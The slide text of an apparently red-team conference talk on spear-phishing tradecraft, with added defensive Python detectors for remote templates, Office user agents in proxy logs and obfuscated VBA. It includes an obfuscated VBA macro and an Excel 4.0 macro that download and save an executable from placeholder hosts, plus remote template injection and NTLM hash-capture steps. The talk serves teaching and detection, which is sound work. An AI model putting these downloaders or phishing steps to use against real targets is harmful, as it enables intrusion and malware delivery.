2. Warning! Challenger approaching
Jesse Nebling (@bashexplode)
● Internal Red Team
● Former Consultant
● Seattle, WA
● Windows exploitation
● “Purple Team” advocate
● Music production
● Stoked to be here
A new foe has appeared!
3. During a Red Team operation, treat the attacker as a real Adversary.
4. What’s the point?
● Spear Phishing trial and error by both Adversaries and Blue Teams
● Pinpoint areas that may help tighten security and foster detection
● Give Blue Teams a glimpse of how Adversaries are plotting against them
6. Recon: Network & (Security) Tech Stack
Typical OSINT Activities:
● whois
● Subdomain lookups
● Job openings for specific technologies
● Current employee job descriptions
● Social Media
● File metadata
● Public code repositories (e.g. github)
● Sites that share tech stacks (e.g. stackshare.io)
● Finding services that expose internal domain names
● Bouncing emails off of domains
What the adversaries use this for:
● Create firewall rules to C2 servers
● Discover single factor authentication entry points
● Environmental keying
● Crafting malicious payloads
● Tailoring tradecraft
Relevant Threat Actor: All
Tool reference: https://github.com/bashexplode/pacifist-toolkit
7. Recon: Network & (Security) Tech Stack
Screenshot: MS Lync/Skype for Business services give the base64 encoded internal NetBIOS domain name and FQDN when invalid credentials are entered.
Screenshot: Bounced email uncovering the internal host and domain name as well as the email sandbox service.
Relevant Threat Actor: All
Talk reference: The Weakest Lync (DerbyCon 2016)
8. Recon: Network & (Security) Tech Stack
Areas of potential detection:
● Mass downloads of externally hosted files
● Emails being bounced against non-existent email accounts
● Bruteforcing single factor authentication pages
Additional time cost to attacker:
● Egress points outside of networks registered under the company's name
● External services fully covered by multifactor authentication
● Employees only have general job descriptions
● Job descriptions do not name specific technologies
● Metadata is wiped from all externally hosted files
● Tech stack is not publicly shared
● Wildcard emails not allowed / cannot bounce emails
Relevant Threat Actor: All
Tool reference: https://github.com/bashexplode/pacifist-toolkit
9. Adversarial OpSec: Testing Dropper Malware
Relevant Threat Actor: All
Assume the Adversary is extremely dedicated. Take all information uncovered from reconnaissance and set up an environment that mimics the target's tech stack.
● Discover methods to bypass AV and EDR tools
● Learn what techniques can be used to move laterally and escalate privileges without triggering alerts in the tech stack
10. Adversarial OpSec: Image Injection & Text Messaging
Relevant Threat Actor: All
Goal: learn whether the document was opened and get alerted to potential blue team activity.
● Set up the payload to reach out to a benign image hosted on the web server
○ Microsoft Word -> Insert Quick Parts -> Field -> IncludePicture -> Data not stored with document
● Any time the image is requested, send a text message for instant notification that the payload has been opened
● UNC path injection can also be used to obtain an NTLMv2 hash and an alert
User Agent for Image GET Requests (Win 10):
● MS Word Office 365 Version 16.0.12026:
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
● MS Word Version 14.0.4760.1000.20344:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)
Sample Python text message script:
import smtplib
# Send the notification through Gmail's SMTP relay to a carrier's email-to-SMS gateway
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login('<gmail_address>', '<gmail_password>')
server.sendmail('<from>', '<number>@vtext.com', 'PWND')
server.quit()
SMS email reference: https://bit.ly/32XiN4l
11. Adversarial OpSec: One-Time Use Tokens
Used in combination with network firewall rules to help further tighten access control on malicious payloads.
● Set up a staging server with a database that tracks token usage
● Set up the payload to reach out to a web page with a token
● If it is the first (or second) time the token is used, redirect to the real payload
● Otherwise, redirect to a benign page or benign payload
● Set up htaccess to redirect atypical user agents
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
Tool reference: https://github.com/bashexplode/otu-plz
12. Adversarial OpSec
Areas of potential detection:
● Office/PDF reader processes with outbound network connectivity (HTTP(S), SMB, DNS)
● Malicious links in emails from non-trusted domains
● Previously mentioned GET requests with Office User Agent strings
● For the extremely curious, mass phishing campaigns with similar links and one-time use tokens can be used to track down an unclicked link to analyze a payload
Incident Response and Defense tips:
● Avoid downloading payloads for analysis directly from malicious servers; htaccess redirection may be in place
● Assume the adversary knows how to get around EDR tools and AV; after tuning these for lesser skilled adversaries, focus on other anomalous activity such as low-level users using administrative command line utilities, lateral movement from HR department workstations, etc.
● Disable SMB outbound traffic
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
13. Malicious Attachments Overview
Many email sandboxing/filtering solutions have cracked down on well-known payloads and block them from reaching the recipient altogether.
Dedicated adversaries will discover ways around these protections...
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0, Tropic Trooper
MITRE ATT&CK ID: T1221
14. Malicious Attachments: Remote Template Injection
Pre-staging technique that avoids sending the true payload and risking discovery of C2 infrastructure
● Create a document template that has a malicious macro in it
● Set up a burner staging server and host the Word document template on a site that looks legitimate
● Create a benign document and edit the XML relationship file stored in the Word document archive to point at the hosted template file
○ Document.docx\word\_rels\settings.xml.rels
● Allows the docx file to run macros while nothing malicious is in the document sent to the user!
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0...
MITRE ATT&CK ID: T1221
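The relationship file named above is also where a defender can look for this technique. The following is an added example (not from the talk or the speaker's tooling) that opens a .docx as the zip archive it is, reads every .rels part, and reports attachedTemplate relationships whose target is remote (http(s), a UNC path, or a file:// URL with a server component). It leaves plain file:///C:/... targets alone, which is how Word records a locally attached template, so Normal.dotm does not produce false positives. The build_sample_docx helper constructs a minimal stand-in document for offline testing; the hostnames in it are placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# OOXML relationships namespace and the relationship type Word uses for the attached template.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)


def external_relationships(docx_bytes):
    """Yield (rels_path, rel_type, target) for every relationship in any
    .rels part whose TargetMode is External."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    yield name, rel.get("Type", ""), rel.get("Target", "")


def is_remote_target(target):
    """True when a template target points off-host: http(s) URLs, UNC paths,
    or file:// URLs with a server component. A plain file:///C:/... target is
    how Word records a locally attached template, so it is not flagged."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme in ("http", "https"):
        return True
    return scheme == "file" and bool(parsed.netloc)


def remote_template_targets(docx_bytes):
    """Return [(rels_path, target), ...] for attachedTemplate relationships
    that resolve to a remote location."""
    return [
        (path, target)
        for path, rel_type, target in external_relationships(docx_bytes)
        if rel_type == ATTACHED_TEMPLATE and is_remote_target(target)
    ]


def build_sample_docx(template_target):
    """Constructed minimal .docx (not real Word output) whose
    word/_rels/settings.xml.rels carries an attachedTemplate relationship."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    settings = (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for target in (
        "https://staging.example/templates/Template.dotm",   # constructed remote target
        "\\\\fileserver.example\\share\\Template.dotm",       # constructed UNC target
        "file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm",  # local, benign
    ):
        hits = remote_template_targets(build_sample_docx(target))
        print("FLAG" if hits else "ok  ", target)
```

Run it against real attachments by passing the file's bytes to remote_template_targets; because every .rels part is inspected, external targets in other relationship files (for example a remote image used for the open-tracking described earlier) can be surfaced the same way by dropping the rel_type filter.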
Remote Template Web Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026
● MS Word Version 14.0.4760.1000.20344
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
HEAD /payload-dir/Template.dotm "Microsoft Office Word 2014"
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
OPTIONS /payload-dir/ "Microsoft Office Protocol Discovery"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
x2 OPTIONS /payload-dir/Template.dotm "Microsoft-WebDAV-MiniRedir/10.0.17134"
x4 PROPFIND /payload-dir/ "Microsoft-WebDAV-MiniRedir/10.0.17134"
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
x2 PROPFIND / "Microsoft-WebDAV-MiniRedir/10.0.17134"
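The user-agent strings on this slide and on the image-injection slide are what a blue team actually sees in proxy logs, so here is an added example (not part of the talk or the speaker's tools) of a small log scanner built around them. It classifies each request by the Office client that issued it (the ms-office/MSOffice GETs, the "Microsoft Office ... Discovery" probes, and the WebDAV MiniRedir fallback), lists Office-originated requests to hosts outside an allowlist, and separately reports client/host pairs that show the probe-then-fetch-a-.dotm pattern of a remote template load. The log line format, hostnames and sample entries are all constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed proxy log format used for this example:
#   <timestamp> <client_ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

TEMPLATE_EXTENSIONS = (".dotm", ".dotx", ".dot")


def classify_user_agent(ua):
    """Map a User-Agent to the Office network client it came from, or None.
    The strings are the ones shown in the slides; matching is case-insensitive."""
    u = ua.lower()
    if "microsoft-webdav-miniredir" in u:
        return "webdav-miniredir"   # WebDAV client Word falls back to (OPTIONS/PROPFIND)
    if u.startswith("microsoft office"):
        return "office-probe"       # "Microsoft Office Word 2014", "... Existence/Protocol Discovery"
    if "ms-office" in u or "msoffice" in u:
        return "office-http"        # GETs for images/templates: "... ms-office; MSOffice 16)"
    return None


def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["host"] = (urlparse(rec["url"]).hostname or "").lower()
    rec["client"] = classify_user_agent(rec["ua"])
    return rec


def office_fetches(lines, trusted_hosts):
    """Requests issued by an Office client to a host outside the allowlist."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["client"] and rec["host"] not in trusted:
            hits.append((rec["ip"], rec["method"], rec["url"], rec["client"]))
    return hits


def remote_template_sequences(lines, trusted_hosts):
    """(client_ip, host) pairs where Office probed a path (OPTIONS/HEAD/PROPFIND)
    and also fetched a template file: the request pattern of a remote template load."""
    trusted = {h.lower() for h in trusted_hosts}
    seen = defaultdict(lambda: {"probe": False, "template_get": False})
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec["client"] or rec["host"] in trusted:
            continue
        key = (rec["ip"], rec["host"])
        if rec["client"] in ("office-probe", "webdav-miniredir"):
            seen[key]["probe"] = True
        path = urlparse(rec["url"]).path.lower()
        if rec["method"] == "GET" and path.endswith(TEMPLATE_EXTENSIONS):
            seen[key]["template_get"] = True
    return sorted(k for k, v in seen.items() if v["probe"] and v["template_get"])


# Constructed sample log lines; hosts under .example / .invalid are placeholders.
SAMPLE_LOG = [
    '2019-10-01T12:00:01Z 10.1.2.3 GET https://cdn.internal.example/logo.png 200 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/77.0"',
    '2019-10-01T12:00:05Z 10.1.2.3 GET http://files.attacker.invalid/img/banner.jpg 200 '
    '"Mozilla/4.0 (compatible; ms-office; MSOffice 16)"',
    '2019-10-01T12:00:06Z 10.1.2.3 OPTIONS http://files.attacker.invalid/payload-dir/ 200 '
    '"Microsoft Office Protocol Discovery"',
    '2019-10-01T12:00:06Z 10.1.2.3 HEAD http://files.attacker.invalid/payload-dir/Template.dotm 200 '
    '"Microsoft Office Existence Discovery"',
    '2019-10-01T12:00:07Z 10.1.2.3 PROPFIND http://files.attacker.invalid/payload-dir/ 207 '
    '"Microsoft-WebDAV-MiniRedir/10.0.17134"',
    '2019-10-01T12:00:08Z 10.1.2.3 GET http://files.attacker.invalid/payload-dir/Template.dotm 200 '
    '"Mozilla/4.0 (compatible; ms-office; MSOffice 16)"',
    '2019-10-01T12:03:00Z 10.1.2.9 GET https://templates.corp.example/quarterly.dotx 200 '
    '"Microsoft Office Word 2014"',
]
TRUSTED_HOSTS = ["cdn.internal.example", "templates.corp.example"]

if __name__ == "__main__":
    for hit in office_fetches(SAMPLE_LOG, TRUSTED_HOSTS):
        print("office client ->", hit)
    print("remote template sequences:", remote_template_sequences(SAMPLE_LOG, TRUSTED_HOSTS))
```

One caveat the slides themselves point at: the Excel 4.0 URLDownloadToFileA fetch on the next slide carries a generic IE-style user agent with no ms-office marker, so user-agent matching alone misses it. Pair this with the process-level signal from slide 12 (Office processes with outbound HTTP(S)/SMB/DNS), which does not depend on the string the client chooses to send.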
15. Malicious Attachments: VBA Macros
Classic Initial Access technique that has gone through many iterations
● WMI execution
● PowerShell download cradles
● Hiding variables in document properties
● Hiding variables in document XML
● Hiding variables in images/alternative text
● Reverse strings and replace characters
● Use words relevant to the business as variable names
● Stage the payload
● Execute outside of the Office process ancestry
Relevant Threat Actors: APT12, APT19, APT28, FIN4...
MITRE ATT&CK IDs: T1193, T1064
References: VBA Stomping - Advanced Malware Techniques (DerbyCon 2018)
Sub Auto_Open(): downloadFile : XSL : PrivacyMode : End Sub
Function PrivacyMode()
    ' Hide the decoy shape once the macro has run
    ActiveSheet.Shapes(1).Visible = msoFalse
End Function
Function downloadFile()
    ' Replacement characters
    accounting = "#$"
    ' stage URL https://example.com/payload.jpg (reversed, with the replacement characters inserted)
    finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//#$sp#$tth"
    ' where to save the downloaded file to - C:\Users\<user>\Desktop\test.exe
    path = Environ("userprofile") & Application.PathSeparator & _
        StrReverse(Replace("ex#$e.ts#$et\po#$tks#$eD", accounting, ""))
    ' MSXML2.ServerXMLHTTP object
    Set Tuesday = CreateObject(StrReverse(Replace("PTTHLMXre#$vreS.2LMXSM", accounting, "")))
    ' Creating and sending GET request for payload
    Tuesday.Open "GET", finance, False
    Tuesday.send
    If Tuesday.Status = 200 Then
        ' ADODB.Stream object
        Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")))
        January.Open
        January.Type = 1
        January.Write Tuesday.ResponseBody
        January.Position = 0
        January.SaveToFile path
        January.Close
    End If
End Function
' Execution via XSL
Function XSL()
…SNIP…
End Function
16. Malicious Attachments: Excel 4.0/VBA Hybrid
Relevant Threat Actor: TA505
Use an old version of Excel macros to execute code that bypasses current detection tools
● Stan Hegt and team showed how to execute shellcode directly through Windows APIs and Excel 4.0 macros at DerbyCon
● I wanted to get away from two things with this method
○ Spawning as a child process of Excel
○ Giving away C2 infrastructure if the doc is discovered
● Came up with my own attack flow with an Excel 4.0 downloader and VBA execution
References: The MS Office Magic Show (DerbyCon 2018)
Sample Excel 4.0 Macro:
● Insert... -> MS Excel 4.0 Macro
● Set Define Name for Cell A1 to "Auto_Open"
=REGISTER("Urlmon","URLDownloadToFileA","JJCCJJ","URLD",,1,9)
=URLD(,"https://example.com/logo.jpg","C:\temp\artifact.exe",0,)
=WAIT(NOW() + "00:00:05")
'VBA Execution Function
=Taxes()
=HALT()
User Agent for GET Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; wbx 1.0.0; Zoom 3.6.0)
● MS Word Version 14.0.4760.1000.20344:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
17. Malicious Attachments
Relevant Threat Actor: TA505
Points of discovery:
● Documents with outbound network connectivity
● VBA scripts run from documents
● Execution as a child process of an Office product
● Old format versions of Office documents (<Office 2003)
● Calls to misused objects and functions in Office VBA macros:
○ C08AFD90-F2A1-11D1-8455-00A0C91F3880
○ Microsoft.XMLDOM
○ Schedule.Service
○ ADODB.Stream
○ MSXML2.ServerXMLHTTP
○ ActiveSheet.Shapes(#).Visible = msoFalse
○ StrReverse
○ Replace
Incident Response tip:
● Sandbox payloads on a system representative of your domain without outbound connectivity (environmental keying bypasses this)
● oledump.py to scrape VBA and Excel 4.0 (plugin_biff.py) macro content and view the code
Tool reference: https://github.com/DidierStevens/DidierStevensSuite
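Once oledump.py has produced the macro source, the indicator list above can be applied to it mechanically, but the reversed-and-replaced strings from the VBA slide defeat a plain grep: "ADODB.Stream" never appears literally. The following is an added example (not from the talk or its referenced tools) of a scanner that statically evaluates the StrReverse(Replace("...", sep, "")) idiom, resolving the separator either from a quoted literal or from a variable assigned a literal elsewhere in the module, and then matches the slide's indicator list against both the raw source and the recovered strings. The SAMPLE_MACRO fragment is constructed to mirror the obfuscation style on the VBA slide.

```python
import re

# Indicators from the slide, matched case-insensitively (VBA is case-insensitive)
# against the macro source plus any strings recovered from StrReverse/Replace.
INDICATORS = {
    "C08AFD90-F2A1-11D1-8455-00A0C91F3880": re.compile(r"C08AFD90-F2A1-11D1-8455-00A0C91F3880", re.I),
    "Microsoft.XMLDOM": re.compile(r"Microsoft\.XMLDOM", re.I),
    "Schedule.Service": re.compile(r"Schedule\.Service", re.I),
    "ADODB.Stream": re.compile(r"ADODB\.Stream", re.I),
    "MSXML2.ServerXMLHTTP": re.compile(r"MSXML2\.ServerXMLHTTP", re.I),
    "ActiveSheet.Shapes(#).Visible = msoFalse": re.compile(r"Shapes\(\s*\d+\s*\)\.Visible\s*=\s*msoFalse", re.I),
    "StrReverse": re.compile(r"\bStrReverse\s*\(", re.I),
    "Replace": re.compile(r"\bReplace\s*\(", re.I),
}

# StrReverse(Replace("<literal>", <sep>, "")) where <sep> is a quoted literal
# or a variable name that is assigned a literal elsewhere in the module.
OBFUSCATED_RE = re.compile(
    r'StrReverse\s*\(\s*Replace\s*\(\s*"(?P<lit>[^"]*)"\s*,\s*'
    r'(?:"(?P<sep_lit>[^"]*)"|(?P<sep_var>[A-Za-z_]\w*))\s*,\s*""\s*\)\s*\)',
    re.I,
)
ASSIGN_RE = re.compile(r'^\s*(?P<name>[A-Za-z_]\w*)\s*=\s*"(?P<value>[^"]*)"\s*$', re.M)


def string_assignments(source):
    """Map variable name (lower-cased) -> string literal assigned to it."""
    return {m.group("name").lower(): m.group("value") for m in ASSIGN_RE.finditer(source)}


def decode_obfuscated_strings(source):
    """Statically evaluate StrReverse(Replace(lit, sep, "")) occurrences and
    return {original_literal: decoded_string}."""
    assignments = string_assignments(source)
    decoded = {}
    for m in OBFUSCATED_RE.finditer(source):
        sep = m.group("sep_lit")
        if sep is None:
            sep = assignments.get(m.group("sep_var").lower())
            if sep is None:
                continue  # separator is computed at runtime; cannot resolve statically
        stripped = m.group("lit").replace(sep, "") if sep else m.group("lit")
        decoded[m.group("lit")] = stripped[::-1]
    return decoded


def scan_macro(source):
    """Return the recovered strings and the sorted list of indicator names hit."""
    decoded = decode_obfuscated_strings(source)
    haystack = source + "\n" + "\n".join(decoded.values())
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"decoded": decoded, "indicators": hits}


# Constructed macro fragment modelled on the obfuscation style shown on the VBA slide.
SAMPLE_MACRO = '''
Function PrivacyMode()
    ActiveSheet.Shapes(1).Visible = msoFalse
End Function
Function downloadFile()
    accounting = "#$"
    Set Tuesday = CreateObject(StrReverse(Replace("PTTHLMXre#$vreS.2LMXSM", accounting, "")))
    Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")))
    Set Svc = CreateObject(StrReverse(Replace("ecivr!!eS.el!!udehcS", "!!", "")))
End Function
'''

if __name__ == "__main__":
    result = scan_macro(SAMPLE_MACRO)
    for literal, plain in result["decoded"].items():
        print(f"{literal!r} -> {plain!r}")
    print("indicators:", result["indicators"])
```

Feed it the text that oledump.py -s <stream> -v prints for a VBA stream; the decoder only handles the exact idiom on the slide, so anything built from Chr() arithmetic or split across several variables still needs the sandbox run the incident response tip recommends.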
18. Malicious Attachments: Calendar Phishing
Make a meeting invite notification pop up posing as an important meeting, with a link to presentation material or conference software to view the meeting
● Create a calendar event and include the victim as an attendee
● Attach a malicious link or document to the invite
● Opt out of sending an invite email
● Shells?
Points of discovery:
● Meetings originating from non-trusted domain email addresses
● Meetings that appear without an emailed meeting invite
Incident Response tip:
● Get the business to disable automatic adding of invitations to the calendar
Relevant Threat Actor: Scammers, me, Future Threat Actors probably
19. Thank you for playing!
Thanks for your time and attention.
Questions?